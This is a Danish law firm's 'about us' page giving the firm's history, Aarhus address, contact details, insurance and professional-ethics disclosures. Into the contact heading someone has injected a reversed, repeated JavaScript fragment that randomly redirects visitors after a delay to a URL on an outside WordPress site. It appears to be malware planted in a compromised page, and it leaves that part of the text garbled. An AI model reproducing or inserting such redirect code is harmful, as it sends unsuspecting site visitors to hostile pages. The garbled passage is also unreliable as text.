Om os

Advokatfirmaet blev grundlagt i 1986 og beskæftiger i dag 8 medarbejdere, heraf 4 jurister.

Meldgaard Advokatfirma er et dynamisk advokatfirma, der lægger afgørende vægt på at kunne yde professionel rådgivning til vore klienter indenfor alle privat- og erhvervsretlige områder.

Advokatfirmaet er centralt beliggende i Aarhus i den gamle hyggelige Mejlgade.

For vore klienter er der mulighed for parkering i gården, hvortil der er indkørsel mellem Mejlgade nr. 16 og nr. 18.

I henhold til de advokatetiske regler skal vi oplyse:

Kontaktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplysninger

Meldgaard Advokatfirma er etableret på følgende adresse: Mejlgade 18, 8000 Aarhus C. Vi kan kontaktes på telefon nummer 86 18 21 11, på telefaxnummer 86 18 22 92 og på e-mailadressen meldgaard@meldgaard-law.dk.

Beskikkelse af Justitsministeriet:

Advokaterne hos Meldgaard advokatfirma er alle beskikket af Justitsministeriet i Danmark og er en del af Advokatsamfundet.

Ansvarsforsikring:

Alle advokater hos Meldgaard Advokatfirma er omfattet af vor ansvarsforsikring og garantiordning tegnet hos Tryg Forsikring A/S. Ansvarsforsikringen dækker al advokatvirksomhed udøvet af advokaterne.

De advokatetiske regler:

Alle danske advokater er underlagt retsplejelovens regler om blandt andet god advokatskik. Advokatrådet fører tilsyn med overholdelsen af god advokatskik og har udarbejdet de advokatetiske regler, som stiller strenge krav til advokaters professionelle standard og etik. Advokatnævnet påser overholdelsen af god advokatskik og kan pålægge sanktioner, hvis reglerne overtrædes.

Virksomhedsform:

Advokatvirksomheden drives som et interessentskab og har CVR-nr. 31 37 69 63.

Lovvalg og værneting:

Meldgaard Advokatfirma anvender ikke aftaleklausuler om lovvalg og/eller værneting, medmindre dette aftales med klienten.